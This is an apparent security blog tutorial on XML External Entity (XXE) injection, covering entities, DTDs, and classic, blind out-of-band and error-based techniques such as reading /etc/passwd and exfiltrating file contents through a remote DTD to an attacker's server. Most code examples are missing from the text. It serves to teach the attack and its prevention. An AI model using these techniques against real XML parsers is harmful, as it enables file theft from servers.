Many different client technologies such as web, mobile, cloud and more – send messages to business applications using XML. In order for the application to work with these self-descriptive XML messages, it has to parse them and check that the format is correct.
This article will describe XML External Entity (XXE) injection attack and its basics in order to provide you with a better understanding of the attack and how to deal with it.
Since we will be talking about XXE injection, first we should understand the meaning of external entities and what they allow us to achieve.
External entities refer to data that an XML processor has to parse. They are useful for creating a common reference that can be shared between multiple documents. Any changes that are made to external entities are automatically updated in the documents which contain references to them. Meaning, XML uses external entities to fetch information or “content” – into the body of the XML document.
To do this, we need to declare an external entity inside the XML document. We can determine its value internally (internal subset):
Or from an external source: (external Subset):
Noticed the SYSTEM identifier? This identifier means that the entity is going to fetch the content from an external source, which in this case is a page under “site.com”.
Great! So much for the purpose of entities… we’ll get back to it later.
In order to declare these entities, we will need to do it inside a Document Type Definition (DTD). A DTD is a set of markup declarations that define a document type for XML (also HTML and SGML). It defines the legal building blocks of an XML document and the document structure with a list of legal elements and attributes. A DTD can be declared inside an XML document, or as an external reference – using SYSTEM identifier to point to another set of declarations in a resolvable location.
Let’s see an example of a DTD, and an entity with a SYSTEM identifier inside the DTD:
And last but not least – the parameter entities!
This type of entity is declared with “%” character (or an encoded %) and used for replacements of text or another content inside the DTD only after they have been parsed and validated:
I’m sure that many of you already got the idea of XXE attacks by now, and we haven’t even started yet! Well, it’s about time. 🙂
XXE attack overview and its techniques
XML External Entity (XXE) attack is one of many injection-based attacks, which occurs when the attacker declares an external entity inside an XML message that is sent to an XML parser used by the application.
This vulnerability has many different types and behaviors because it might occur in different types of technologies – therefore different types of XML parsers. The beauty in this case, is that every parser has different capabilities and “features”, so the exploitation can be very exciting.
Before we start lets define the most common types of XXE vulnerabilities we might face – understanding the type would help us in debugging the attack and in eventually building the right exploit:
- Classic XXE injection – external entity injection inside a local DTD.
- Blind XXE injection – no errors are shown by the XML parser in the response.
- Error-based XXE injection – the SAME response is always shown by the XML parser after a successful parse. (i.e. … “Your message has been received”), for that matter – we might want the parser to “print” the content of the files to the error responses.
Following the previous overview, we said that we can reference data from an external entity by using SYSTEM identifier. So now we can introduce the first technique of XXE injection which is to inject an external entity to the XML document containing SYSTEM identifier that references to a local file path such as “/etc/passwd”:
Now let’s make a more complicated and severe attack:
- What if the application server doesn’t respond back, as part of its generic functionality? (Remember the blind XXE/error-based XXE we mentioned before?)
- What if we want to read data from an external source that has XML special characters in it and it won’t be a well-formed XML document? Meaning – it would probably fail during the parsing process?
This is where we can load a secondary external DTD which references our remote server and tries to fetch the content from its URL – this can be a set of characters, or a dump of file like the example below, and the greatest thing is that it doesn’t even go through the XML schema validation process, since it is sent BEFORE the parser even gets the remote content!
Example, the remote DTD file – containing parameter entities with SYSTEM identifier and “file” handler. Note that parameter entity “file” is also concatenated to the URL inside entity “send”:
After parsing that DTD, we get the following entity:
Eventually, since the server tried to reach the mentioned URL with the content of the file sent as parameter “c” – we log that content and by doing so dumping the file’s content:
Step B – the remote DTD is being parsed. We are stealing the content of the file …..
We got it!
A few things to remember with this technique:
- Character “#” in the file’s content will cause URL truncation.
- Since we define the parameter entity with a ‘ or “, the content might break. It depends what we used (so make sure you use both testing scenarios in case of an error).
Error-based XXE injection
Sometimes when we get a generic response from the server when the parsing process was successful, we might want to count on the detailed errors coming back from the server – therefore, we can use the same technique of the remote DTD – but make a deliberate error such as:
The parser will try to parse the DTD and access the path given in send entity, and by failing to reach “my-evil-domain.$$$$” we will cause the following error:
Debugging our own payload !
Note that any error responded by the server shows which line caused the parsing error, sometimes we might use this information to debug our own payload while having syntax errors, using “\n”. for example:
<!DOCTYPE Author [\n
<!ENTITY %% deliberate_error_here “test”> ]>\n
The extra double “\n” that encloses the payload will result with an error in line 2, after the first “\n” while the rest of the XML content will be in line 3.
In conclusion, XXE is a pretty powerful attack which allows us to manipulate misconfigured XML parsers and take advantage of them. Note that there are more techniques and exploits that can be done by XXE injection. As I said before, every parser has different abilities and therefore we can come up with different exploits:
Based on this table, presented by the researcher Timothy Morgan – these protocols can be used to upload files (jar://..), allow arbitrary data to be sent over TCP connection (gopher://..) in older versions of Java, read PHP source code using PHP handler and more.
Try it yourself by downloading our demo lab which can be downloaded here! The demo contains a .NET xml parser with the XML payload and a remote DTD file in case needed.
For more information on how to prevent XXE attack – click here.